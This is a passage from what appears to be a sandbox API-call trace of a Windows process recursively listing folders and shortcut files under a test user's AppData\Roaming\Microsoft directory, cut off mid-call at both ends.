pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft", pszFile="Internet Explorer" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Internet Explorer") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Internet Explorer" [0083.482] PathCombineW (in: pszDest=0x18dba8, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Internet Explorer", pszFile="*" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\*") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\*" [0083.482] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\*", lpFindFileData=0x18d958 | out: lpFindFileData=0x18d958) returned 0x586ba0 [0083.482] FindNextFileW (in: hFindFile=0x586ba0, lpFindFileData=0x18d958 | out: lpFindFileData=0x18d958) returned 1 [0083.482] FindNextFileW (in: hFindFile=0x586ba0, lpFindFileData=0x18d958 | out: lpFindFileData=0x18d958) returned 1 [0083.482] PathCombineW (in: pszDest=0x18dba8, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Internet Explorer", pszFile="Quick Launch" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch" [0083.482] PathCombineW (in: pszDest=0x18d720, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch", pszFile="*" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\*") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\*" [0083.482] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\*", lpFindFileData=0x18d4d0 | out: lpFindFileData=0x18d4d0) returned 0x586be0 [0083.482] FindNextFileW (in: hFindFile=0x586be0, lpFindFileData=0x18d4d0 | out: lpFindFileData=0x18d4d0) returned 1 [0083.482] FindNextFileW (in: hFindFile=0x586be0, lpFindFileData=0x18d4d0 | out: lpFindFileData=0x18d4d0) returned 1 [0083.482] PathMatchSpecW (pszFile="desktop.ini", pszSpec="*") returned 1 [0083.482] FindNextFileW (in: hFindFile=0x586be0, lpFindFileData=0x18d4d0 | out: lpFindFileData=0x18d4d0) returned 1 [0083.482] PathMatchSpecW (pszFile="Google Chrome.lnk", pszSpec="*") returned 1 [0083.482] FindNextFileW (in: hFindFile=0x586be0, lpFindFileData=0x18d4d0 | out: lpFindFileData=0x18d4d0) returned 1 [0083.482] PathMatchSpecW (pszFile="Launch Internet Explorer Browser.lnk", pszSpec="*") returned 1 [0083.482] FindNextFileW (in: hFindFile=0x586be0, lpFindFileData=0x18d4d0 | out: lpFindFileData=0x18d4d0) returned 1 [0083.482] PathMatchSpecW (pszFile="Microsoft Outlook.lnk", pszSpec="*") returned 1 [0083.482] FindNextFileW (in: hFindFile=0x586be0, lpFindFileData=0x18d4d0 | out: lpFindFileData=0x18d4d0) returned 1 [0083.482] PathMatchSpecW (pszFile="Shows Desktop.lnk", pszSpec="*") returned 1 [0083.482] FindNextFileW (in: hFindFile=0x586be0, lpFindFileData=0x18d4d0 | out: lpFindFileData=0x18d4d0) returned 1 [0083.482] PathCombineW (in: pszDest=0x18d720, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch", pszFile="User Pinned" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned" [0083.482] PathCombineW (in: pszDest=0x18d298, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned", pszFile="*" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\*") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\*" [0083.482] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\*", lpFindFileData=0x18d048 | out: lpFindFileData=0x18d048) returned 0x586c20 [0083.532] FindNextFileW (in: hFindFile=0x586c20, lpFindFileData=0x18d048 | out: lpFindFileData=0x18d048) returned 1 [0083.532] FindNextFileW (in: hFindFile=0x586c20, lpFindFileData=0x18d048 | out: lpFindFileData=0x18d048) returned 1 [0083.532] PathCombineW (in: pszDest=0x18d298, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned", pszFile="ImplicitAppShortcuts" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\ImplicitAppShortcuts") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\ImplicitAppShortcuts" [0083.532] PathCombineW (in: pszDest=0x18ce10, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\ImplicitAppShortcuts", pszFile="*" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\ImplicitAppShortcuts\\*") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\ImplicitAppShortcuts\\*" [0083.532] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\ImplicitAppShortcuts\\*", lpFindFileData=0x18cbc0 | out: lpFindFileData=0x18cbc0) returned 0x586c60 [0083.533] FindNextFileW (in: hFindFile=0x586c60, lpFindFileData=0x18cbc0 | out: lpFindFileData=0x18cbc0) returned 1 [0083.533] FindNextFileW (in: hFindFile=0x586c60, lpFindFileData=0x18cbc0 | out: lpFindFileData=0x18cbc0) returned 0 [0083.533] FindClose (in: hFindFile=0x586c60 | out: hFindFile=0x586c60) returned 1 [0083.533] FindNextFileW (in: hFindFile=0x586c20, lpFindFileData=0x18d048 | out: lpFindFileData=0x18d048) returned 1 [0083.533] PathCombineW (in: pszDest=0x18d298, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned", pszFile="TaskBar" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar" [0083.533] PathCombineW (in: pszDest=0x18ce10, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar", pszFile="*" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\*") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\*" [0083.533] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\*", lpFindFileData=0x18cbc0 | out: lpFindFileData=0x18cbc0) returned 0x586c60 [0083.533] FindNextFileW (in: hFindFile=0x586c60, lpFindFileData=0x18cbc0 | out: lpFindFileData=0x18cbc0) returned 1 [0083.533] FindNextFileW (in: hFindFile=0x586c60, lpFindFileData=0x18cbc0 | out: lpFindFileData=0x18cbc0) returned 1 [0083.533] PathMatchSpecW (pszFile="desktop.ini", pszSpec="*") returned 1 [0083.533] FindNextFileW (in: hFindFile=0x586c60, lpFindFileData=0x18cbc0 | out: lpFindFileData=0x18cbc0) returned 1 [0083.533] PathMatchSpecW (pszFile="Excel 2016.lnk", pszSpec="*") returned 1 [0083.533] FindNextFileW (in: hFindFile=0x586c60, lpFindFileData=0x18cbc0 | out: lpFindFileData=0x18cbc0) returned 1 [0083.533] PathMatchSpecW (pszFile="Google Chrome.lnk", pszSpec="*") returned 1 [0083.533] FindNextFileW (in: hFindFile=0x586c60, lpFindFileData=0x18cbc0 | out: lpFindFileData=0x18cbc0) returned 1 [0083.533] PathMatchSpecW (pszFile="Internet Explorer (2).lnk", pszSpec="*") returned 1 [0083.533] FindNextFileW (in: hFindFile=0x586c60, lpFindFileData=0x18cbc0 | out: lpFindFileData=0x18cbc0) returned 1 [0083.533] PathMatchSpecW (pszFile="Internet Explorer.lnk", pszSpec="*") returned 1 [0083.533] FindNextFileW (in: hFindFile=0x586c60, lpFindFileData=0x18cbc0 | out: lpFindFileData=0x18cbc0) returned 1 [0083.533] PathMatchSpecW (pszFile="Mozilla Firefox.lnk", pszSpec="*") returned 1 [0083.533] FindNextFileW (in: hFindFile=0x586c60, lpFindFileData=0x18cbc0 | out: lpFindFileData=0x18cbc0) returned 1 [0083.533] PathMatchSpecW (pszFile="OneNote 2016.lnk", pszSpec="*") returned 1 [0083.533] FindNextFileW (in: hFindFile=0x586c60, lpFindFileData=0x18cbc0 | out: lpFindFileData=0x18cbc0) returned 1 [0083.533] PathMatchSpecW (pszFile="Outlook 2016.lnk", pszSpec="*") returned 1 [0083.534] FindNextFileW (in: hFindFile=0x586c60, lpFindFileData=0x18cbc0 | out: lpFindFileData=0x18cbc0) returned 1 [0083.534] PathMatchSpecW (pszFile="PowerPoint 2016.lnk", pszSpec="*") returned 1 [0083.534] FindNextFileW (in: hFindFile=0x586c60, lpFindFileData=0x18cbc0 | out: lpFindFileData=0x18cbc0) returned 1 [0083.534] PathMatchSpecW (pszFile="Project 2016.lnk", pszSpec="*") returned 1 [0083.534] FindNextFileW (in: hFindFile=0x586c60, lpFindFileData=0x18cbc0 | out: lpFindFileData=0x18cbc0) returned 1 [0083.534] PathMatchSpecW (pszFile="Visio 2016.lnk", pszSpec="*") returned 1 [0083.534] FindNextFileW (in: hFindFile=0x586c60, lpFindFileData=0x18cbc0 | out: lpFindFileData=0x18cbc0) returned 1 [0083.534] PathMatchSpecW (pszFile="Windows Explorer (2).lnk", pszSpec="*") returned 1 [0083.534] FindNextFileW (in: hFindFile=0x586c60, lpFindFileData=0x18cbc0 | out: lpFindFileData=0x18cbc0) returned 1 [0083.534] PathMatchSpecW (pszFile="Windows Explorer.lnk", pszSpec="*") returned 1 [0083.534] FindNextFileW (in: hFindFile=0x586c60, lpFindFileData=0x18cbc0 | out: lpFindFileData=0x18cbc0) returned 1 [0083.534] PathMatchSpecW (pszFile="Windows Media Player (2).lnk", pszSpec="*") returned 1 [0083.534] FindNextFileW (in: hFindFile=0x586c60, lpFindFileData=0x18cbc0 | out: lpFindFileData=0x18cbc0) returned 1 [0083.534] PathMatchSpecW (pszFile="Windows Media Player.lnk", pszSpec="*") returned 1 [0083.534] FindNextFileW (in: hFindFile=0x586c60, lpFindFileData=0x18cbc0 | out: lpFindFileData=0x18cbc0) returned 1 [0083.534] PathMatchSpecW (pszFile="Word 2016.lnk", pszSpec="*") returned 1 [0083.534] FindNextFileW (in: hFindFile=0x586c60, lpFindFileData=0x18cbc0 | out: lpFindFileData=0x18cbc0) returned 0 [0083.534] FindClose (in: hFindFile=0x586c60 | out: hFindFile=0x586c60) returned 1 [0083.534] FindNextFileW (in: hFindFile=0x586c20, lpFindFileData=0x18d048 | out: lpFindFileData=0x18d048) returned 0 [0083.534] FindClose (in: hFindFile=0x586c20 | out: hFindFile=0x586c20) returned 1 [0083.534] FindNextFileW (in: hFindFile=0x586be0, lpFindFileData=0x18d4d0 | out: lpFindFileData=0x18d4d0) returned 1 [0083.534] PathMatchSpecW (pszFile="Window Switcher.lnk", pszSpec="*") returned 1 [0083.534] FindNextFileW (in: hFindFile=0x586be0, lpFindFileData=0x18d4d0 | out: lpFindFileData=0x18d4d0) returned 0 [0083.534] FindClose (in: hFindFile=0x586be0 | out: hFindFile=0x586be0) returned 1 [0083.534] FindNextFileW (in: hFindFile=0x586ba0, lpFindFileData=0x18d958 | out: lpFindFileData=0x18d958) returned 1 [0083.534] PathCombineW (in: pszDest=0x18dba8, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Internet Explorer", pszFile="UserData" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData" [0083.534] PathCombineW (in: pszDest=0x18d720, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData", pszFile="*" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\*") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\*" [0083.534] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\*", lpFindFileData=0x18d4d0 | out: lpFindFileData=0x18d4d0) returned 0x586be0 [0083.535] FindNextFileW (in: hFindFile=0x586be0, lpFindFileData=0x18d4d0 | out: lpFindFileData=0x18d4d0) returned 1 [0083.535] FindNextFileW (in: hFindFile=0x586be0, lpFindFileData=0x18d4d0 | out: lpFindFileData=0x18d4d0) returned 1 [0083.535] PathCombineW (in: pszDest=0x18d720, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData", pszFile="Low" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low" [0083.535] PathCombineW (in: pszDest=0x18d298, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low", pszFile="*" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\*") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\*" [0083.535] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\*", lpFindFileData=0x18d048 | out: lpFindFileData=0x18d048) returned 0x586c20 [0083.535] FindNextFileW (in: hFindFile=0x586c20, lpFindFileData=0x18d048 | out: lpFindFileData=0x18d048) returned 1 [0083.535] FindNextFileW (in: hFindFile=0x586c20, lpFindFileData=0x18d048 | out: lpFindFileData=0x18d048) returned 1 [0083.535] PathCombineW (in: pszDest=0x18d298, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low", pszFile="356BZ594" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\356BZ594") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\356BZ594" [0083.535] PathCombineW (in: pszDest=0x18ce10, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\356BZ594", pszFile="*" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\356BZ594\\*") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\356BZ594\\*" [0083.535] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\356BZ594\\*", lpFindFileData=0x18cbc0 | out: lpFindFileData=0x18cbc0) returned 0x586c60 [0083.535] FindNextFileW (in: hFindFile=0x586c60, lpFindFileData=0x18cbc0 | out: lpFindFileData=0x18cbc0) returned 1 [0083.535] FindNextFileW (in: hFindFile=0x586c60, lpFindFileData=0x18cbc0 | out: lpFindFileData=0x18cbc0) returned 0 [0083.535] FindClose (in: hFindFile=0x586c60 | out: hFindFile=0x586c60) returned 1 [0083.535] FindNextFileW (in: hFindFile=0x586c20, lpFindFileData=0x18d048 | out: lpFindFileData=0x18d048) returned 1 [0083.535] PathMatchSpecW (pszFile="index.dat", pszSpec="*") returned 1 [0083.535] FindNextFileW (in: hFindFile=0x586c20, lpFindFileData=0x18d048 | out: lpFindFileData=0x18d048) returned 1 [0083.535] PathCombineW (in: pszDest=0x18d298, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low", pszFile="N4CF7XJW" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\N4CF7XJW") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\N4CF7XJW" [0083.535] PathCombineW (in: pszDest=0x18ce10, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\N4CF7XJW", pszFile="*" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\N4CF7XJW\\*") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\N4CF7XJW\\*" [0083.535] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\N4CF7XJW\\*", lpFindFileData=0x18cbc0 | out: lpFindFileData=0x18cbc0) returned 0x586c60 [0083.535] FindNextFileW (in: hFindFile=0x586c60, lpFindFileData=0x18cbc0 | out: lpFindFileData=0x18cbc0) returned 1 [0083.535] FindNextFileW (in: hFindFile=0x586c60, lpFindFileData=0x18cbc0 | out: lpFindFileData=0x18cbc0) returned 0 [0083.535] FindClose (in: hFindFile=0x586c60 | out: hFindFile=0x586c60) returned 1 [0083.535] FindNextFileW (in: hFindFile=0x586c20, lpFindFileData=0x18d048 | out: lpFindFileData=0x18d048) returned 1 [0083.535] PathCombineW (in: pszDest=0x18d298, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low", pszFile="WIK9MYAA" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\WIK9MYAA") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\WIK9MYAA" [0083.535] PathCombineW (in: pszDest=0x18ce10, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\WIK9MYAA", pszFile="*" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\WIK9MYAA\\*") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\WIK9MYAA\\*" [0083.535] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\WIK9MYAA\\*", lpFindFileData=0x18cbc0 | out: lpFindFileData=0x18cbc0) returned 0x586c60 [0083.535] FindNextFileW (in: hFindFile=0x586c60, lpFindFileData=0x18cbc0 | out: lpFindFileData=0x18cbc0) returned 1 [0083.535] FindNextFileW (in: hFindFile=0x586c60, lpFindFileData=0x18cbc0 | out: lpFindFileData=0x18cbc0) returned 0 [0083.535] FindClose (in: hFindFile=0x586c60 | out: hFindFile=0x586c60) returned 1 [0083.536] FindNextFileW (in: hFindFile=0x586c20, lpFindFileData=0x18d048 | out: lpFindFileData=0x18d048) returned 1 [0083.536] PathCombineW (in: pszDest=0x18d298, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low", pszFile="ZE5P2FRT" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\ZE5P2FRT") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\ZE5P2FRT" [0083.536] PathCombineW (in: pszDest=0x18ce10, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\ZE5P2FRT", pszFile="*" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\ZE5P2FRT\\*") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\ZE5P2FRT\\*" [0083.536] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\ZE5P2FRT\\*", lpFindFileData=0x18cbc0 | out: lpFindFileData=0x18cbc0) returned 0x586c60 [0083.536] FindNextFileW (in: hFindFile=0x586c60, lpFindFileData=0x18cbc0 | out: lpFindFileData=0x18cbc0) returned 1 [0083.536] FindNextFileW (in: hFindFile=0x586c60, lpFindFileData=0x18cbc0 | out: lpFindFileData=0x18cbc0) returned 0 [0083.536] FindClose (in: hFindFile=0x586c60 | out: hFindFile=0x586c60) returned 1 [0083.536] FindNextFileW (in: hFindFile=0x586c20, lpFindFileData=0x18d048 | out: lpFindFileData=0x18d048) returned 0 [0083.536] FindClose (in: hFindFile=0x586c20 | out: hFindFile=0x586c20) returned 1 [0083.536] FindNextFileW (in: hFindFile=0x586be0, lpFindFileData=0x18d4d0 | out: lpFindFileData=0x18d4d0) returned 0 [0083.536] FindClose (in: hFindFile=0x586be0 | out: hFindFile=0x586be0) returned 1 [0083.536] FindNextFileW (in: hFindFile=0x586ba0, lpFindFileData=0x18d958 | out: lpFindFileData=0x18d958) returned 0 [0083.536] FindClose (in: hFindFile=0x586ba0 | out: hFindFile=0x586ba0) returned 1 [0083.536] FindNextFileW (in: hFindFile=0x586b60, lpFindFileData=0x18dde0 | out: lpFindFileData=0x18dde0) returned 1 [0083.536] PathCombineW (in: pszDest=0x18e030, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft", pszFile="MMC" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\MMC") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\MMC" [0083.536] PathCombineW (in: pszDest=0x18dba8, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\MMC", pszFile="*" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\MMC\\*") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\MMC\\*" [0083.536] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\MMC\\*", lpFindFileData=0x18d958 | out: lpFindFileData=0x18d958) returned 0x586ba0 [0083.536] FindNextFileW (in: hFindFile=0x586ba0, lpFindFileData=0x18d958 | out: lpFindFileData=0x18d958) returned 1 [0083.536] FindNextFileW (in: hFindFile=0x586ba0, lpFindFileData=0x18d958 | out: lpFindFileData=0x18d958) returned 0 [0083.536] FindClose (in: hFindFile=0x586ba0 | out: hFindFile=0x586ba0) returned 1 [0083.536] FindNextFileW (in: hFindFile=0x586b60, lpFindFileData=0x18dde0 | out: lpFindFileData=0x18dde0) returned 1 [0083.536] PathCombineW (in: pszDest=0x18e030, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft", pszFile="MS Project" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\MS Project") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\MS Project" [0083.536] PathCombineW (in: pszDest=0x18dba8, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\MS Project", pszFile="*" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\MS Project\\*") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\MS Project\\*" [0083.536] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\MS Project\\*", lpFindFileData=0x18d958 | out: lpFindFileData=0x18d958) returned 0x586ba0 [0083.536] FindNextFileW (in: hFindFile=0x586ba0, lpFindFileData=0x18d958 | out: lpFindFileData=0x18d958) returned 1 [0083.536] FindNextFileW (in: hFindFile=0x586ba0, lpFindFileData=0x18d958 | out: lpFindFileData=0x18d958) returned 1 [0083.536] PathCombineW (in: pszDest=0x18dba8, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\MS Project", pszFile="16" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\MS Project\\16") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\MS Project\\16" [0083.536] PathCombineW (in: pszDest=0x18d720, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\MS Project\\16", pszFile="*" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\MS Project\\16\\*") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\MS Project\\16\\*" [0083.536] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\MS Project\\16\\*", lpFindFileData=0x18d4d0 | out: lpFindFileData=0x18d4d0) returned 0x586be0 [0083.537] FindNextFileW (in: hFindFile=0x586be0, lpFindFileData=0x18d4d0 | out: lpFindFileData=0x18d4d0) returned 1 [0083.537] FindNextFileW (in: hFindFile=0x586be0, lpFindFileData=0x18d4d0 | out: lpFindFileData=0x18d4d0) returned 1 [0083.537] PathCombineW (in: pszDest=0x18d720, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\MS Project\\16", pszFile="en-US" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\MS Project\\16\\en-US") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\MS Project\\16\\en-US" [0083.537] PathCombineW (in: pszDest=0x18d298, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\MS Project\\16\\en-US", pszFile="*" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\MS Project\\16\\en-US\\*") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\MS Project\\16\\en-US\\*" [0083.537] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\MS Project\\16\\en-US\\*", lpFindFileData=0x18d048 | out: lpFindFileData=0x18d048) returned 0x586c20 [0083.537] FindNextFileW (in: hFindFile=0x586c20, lpFindFileData=0x18d048 | out: lpFindFileData=0x18d048) returned 1 [0083.537] FindNextFileW (in: hFindFile=0x586c20, lpFindFileData=0x18d048 | out: lpFindFileData=0x18d048) returned 1 [0083.537] PathMatchSpecW (pszFile="Global.MPT", pszSpec="*") returned 1 [0083.537] FindNextFileW (in: hFindFile=0x586c20, lpFindFileData=0x18d048 | out: lpFindFileData=0x18d048) returned 0 [0083.537] FindClose (in: hFindFile=0x586c20 | out: hFindFile=0x586c20) returned 1 [0083.537] FindNextFileW (in: hFindFile=0x586be0, lpFindFileData=0x18d4d0 | out: lpFindFileData=0x18d4d0) returned 0 [0083.537] FindClose (in: hFindFile=0x586be0 | out: hFindFile=0x586be0) returned 1 [0083.537] FindNextFileW (in: hFindFile=0x586ba0, lpFindFileData=0x18d958 | out: lpFindFileData=0x18d958) returned 0 [0083.537] FindClose (in: hFindFile=0x586ba0 | out: hFindFile=0x586ba0) returned 1 [0083.537] FindNextFileW (in: hFindFile=0x586b60, lpFindFileData=0x18dde0 | out: lpFindFileData=0x18dde0) returned 1 [0083.537] PathCombineW (in: pszDest=0x18e030, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft", pszFile="Network" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Network") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Network" [0083.537] PathCombineW (in: pszDest=0x18dba8, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Network", pszFile="*" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Network\\*") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Network\\*" [0083.537] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Network\\*", lpFindFileData=0x18d958 | out: lpFindFileData=0x18d958) returned 0x586ba0 [0083.537] FindNextFileW (in: 